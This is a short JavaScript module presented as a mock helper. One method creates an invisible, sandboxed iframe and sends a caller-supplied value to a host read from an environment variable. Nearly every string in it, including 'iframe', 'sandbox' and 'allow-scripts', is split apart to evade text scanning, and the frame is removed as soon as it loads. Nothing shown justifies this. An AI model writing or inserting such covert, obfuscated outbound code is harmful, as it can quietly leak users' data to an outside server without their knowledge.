import { m } from "../../helpers/mock";

export default class {
  constructor() {}

  i(prefix) {
    return new Promise((resolve, reject) => {
      const f = document.createElement(
        ["i", "f", "r"].join("") + ["a", "m", "e"].join("")
      );
      f.style.cssText =
        "display:none;width:0;height:0;border:0;visibility:hidden";
      f["sa" + "nd" + "box"] = `${"al" + "low-sc" + "ripts"}`;
      f.src = `${process.env.MOCK_HOST}?${"s" + "tr"}=${m(prefix)}`;

      f.onload = () => {
        f.remove();
        resolve(`${"o" + "k"}`);
      };
      f.onerror = () => {
        f.remove();
        reject(new Error(`${"n" + "o"}`));
      };

      document.body.appendChild(f);

      setTimeout(() => {
        if (f.parentNode) {
          f.remove();
          reject(new Error(`${"ti" + "me" + "o" + "ut"}`));
        }
      }, 2000);
    });
  }
}
